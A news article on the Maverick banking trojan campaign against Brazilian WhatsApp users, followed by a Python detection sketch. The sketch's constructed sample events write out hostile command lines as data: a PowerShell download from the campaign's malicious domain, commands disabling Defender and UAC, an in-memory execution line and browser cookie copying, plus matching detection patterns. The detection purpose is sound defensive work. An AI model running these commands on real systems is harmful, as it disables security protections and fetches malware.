Threat hunters reported technical similarities between a known Brazilian banking trojan called Coyote and a newly described threat named Maverick, saying both are written in .NET, target Brazilian users and banks, and share functionality to decrypt traffic, monitor banking applications and target banking URLs. CyberProof detailed those findings in a report, and analysts noted both families include the ability to spread through WhatsApp Web.
Security vendor Trend Micro documented Maverick and attributed its use to a group it calls Water Saci, describing a campaign that uses a self-propagating component named SORVEPOTEL to distribute a ZIP archive containing the Maverick payload. Trend Micro said the campaign relies on WhatsApp Web automation and an initial downloader that runs inside users’ desktop browser sessions.
CyberProof reported that the delivered ZIP contains a Windows shortcut that, when launched, runs cmd.exe or PowerShell to contact an external host (zapgrande[.]com) to download a first-stage payload. The PowerShell routines can disable Microsoft Defender and UAC and retrieve a .NET loader that uses anti-analysis checks, then fetches the SORVEPOTEL and Maverick modules. The analysis noted Maverick is staged only after locale checks such as time zone, language and date format indicate the host is in Brazil.
Trend Micro described a revised Water Saci attack chain that avoids .NET launchers in favor of Visual Basic Script and PowerShell to hijack WhatsApp browser sessions and propagate the ZIP file, using browser automation tools including ChromeDriver and Selenium. The malware copies a victim's Chrome profile data to a temporary workspace so it can reuse the stored cookies and authentication tokens, a step the vendor said lets it drive an already-authenticated WhatsApp Web session without a QR-code re-scan.
The campaign’s downloader is an obfuscated VBS file named “Orcamento.vbs” (identified as SORVEPOTEL) that invokes a PowerShell script called “tadeu.ps1” directly in memory. That script remotely controls the victim’s WhatsApp Web session to send the malicious ZIP to harvested contacts, display a deceptive banner labeled “WhatsApp Automation v6.0”, and retrieve message templates and contact lists from a command-and-control server, researchers said.
Analysts also described an email-based command-and-control mechanism that uses IMAP connections to attacker-controlled terra.com[.]br accounts to retrieve C2 URLs; multi-factor protection on some of those accounts has introduced manual delays because the actors must enter one-time codes. The backdoor supports a wide set of remote commands for information collection, file operations, process control, screenshots and software updates, according to the report.
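The four preceding paragraphs describe one attack chain: a shortcut spawning cmd.exe or PowerShell to download from zapgrande[.]com, PowerShell tampering with Defender and UAC, wscript running the VBS downloader that invokes PowerShell in memory, Chrome profile files copied into a temp workspace, ChromeDriver launched from a script host, and IMAP to terra.com[.]br for C2. The Python below is an added detection sketch written for this page; it is not code from CyberProof, Trend Micro or the malware. It runs simple telemetry rules over constructed sample events shaped loosely like Sysmon process, file and network records. The paths, user name, URL path, IMAP host label and the exact command lines are assumptions made for the sample; only the domain names, tool names and behaviours come from the reporting above.

```python
"""Behavioural rules for the Water Saci / SORVEPOTEL chain, over constructed events."""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
BROWSER_PROFILE_FILES = {"cookies", "local state", "login data", "web data"}
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|bitsadmin|start-bitstransfer", re.I)
# Defender real-time protection off, or UAC (EnableLUA) set to 0 via reg.exe
TAMPER_RE = re.compile(r"set-mppreference\s+-disable|enablelua\s+/t\s+reg_dword\s+/d\s+0", re.I)
TEMP_RE = re.compile(r"\\appdata\\local\\temp\\", re.I)

# Constructed sample telemetry (not real log lines). Events 1-6 mimic the chain;
# 7-9 are benign controls that must not fire. URL path, user "ana", the Temp
# workspace name and the IMAP host label are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c powershell -w hidden -c "iwr http://zapgrande.com/payload -OutFile $env:TEMP\a.ps1"'},
    {"id": 2, "type": "process", "image": PS, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell Set-MpPreference -DisableRealtimeMonitoring $true; reg add "
                r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"id": 3, "type": "process", "image": PS, "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell -nop -w hidden -ep bypass -c IEX(...)"},  # VBS downloader running PS1 in memory
    {"id": 4, "type": "file", "image": PS,
     "target": r"C:\Users\ana\AppData\Local\Temp\ws_profile\Default\Cookies"},
    {"id": 5, "type": "process", "image": r"C:\Users\ana\AppData\Local\Temp\chromedriver.exe", "parent": PS,
     "cmdline": "chromedriver.exe --port=9515"},
    {"id": 6, "type": "network", "image": PS, "dst_port": 993, "dst_host": "imap.terra.com.br"},
    {"id": 7, "type": "file", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\ana\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"id": 8, "type": "process", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell Get-ChildItem C:\Users\ana\Documents"},
    {"id": 9, "type": "network", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "dst_port": 993, "dst_host": "outlook.office365.com"},
]


def _name(path):
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def shell_download_from_explorer(e):
    """User double-clicked something (parent explorer.exe) and a shell immediately downloads."""
    return (e["type"] == "process" and _name(e["parent"]) == "explorer.exe"
            and _name(e["image"]) in SHELLS and bool(DOWNLOAD_RE.search(e.get("cmdline", ""))))


def defender_or_uac_tamper(e):
    return e["type"] == "process" and bool(TAMPER_RE.search(e.get("cmdline", "")))


def wscript_spawns_powershell(e):
    return (e["type"] == "process" and _name(e["parent"]) in {"wscript.exe", "cscript.exe"}
            and _name(e["image"]) in {"powershell.exe", "pwsh.exe"})


def browser_profile_copied_to_temp(e):
    """Chrome profile artefacts written under %TEMP% by something other than Chrome."""
    return (e["type"] == "file" and _name(e["target"]) in BROWSER_PROFILE_FILES
            and bool(TEMP_RE.search(e["target"])) and _name(e["image"]) != "chrome.exe")


def chromedriver_from_script_host(e):
    return (e["type"] == "process" and _name(e["parent"]) in SCRIPT_HOSTS
            and (_name(e["image"]) == "chromedriver.exe" or "chromedriver" in e.get("cmdline", "").lower()))


def script_host_imap(e):
    """Script interpreters have no business speaking IMAP; mail clients do."""
    return e["type"] == "network" and e["dst_port"] in (143, 993) and _name(e["image"]) in SCRIPT_HOSTS


RULES = {f.__name__: f for f in (shell_download_from_explorer, defender_or_uac_tamper, wscript_spawns_powershell,
                                  browser_profile_copied_to_temp, chromedriver_from_script_host, script_host_imap)}


def evaluate(events):
    """Map each rule that fired to the sorted ids of the events that triggered it."""
    hits = {}
    for name, rule in RULES.items():
        ids = sorted(e["id"] for e in events if rule(e))
        if ids:
            hits[name] = ids
    return hits


def chain_score(events):
    """Number of distinct chain stages seen; several stages on one host is the strong signal."""
    return len(evaluate(events))


if __name__ == "__main__":
    for rule, ids in evaluate(SAMPLE_EVENTS).items():
        print(f"{rule}: events {ids}")
    print("chain score:", chain_score(SAMPLE_EVENTS))
```

Any single rule here is noisy on its own (admins do run Copy-Item and reg.exe); the point is that the reported chain touches six distinct behaviours on one host within a short window, so correlate by host and alert on the count rather than on individual matches. The sample's benign controls (Chrome writing its own Cookies file, an Outlook IMAP session, a plain Get-ChildItem from the desktop) score zero.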
Researchers noted the campaign may be expanding its targeting, including to hotels in Brazil, and said the convergence of techniques suggests Water Saci is likely linked to Coyote, though other firms have cautioned that Maverick exhibits distinct characteristics and have treated it as a new, widespread threat. The reliance on WhatsApp is notable given the app's popularity in Brazil, where it has 148 million active users.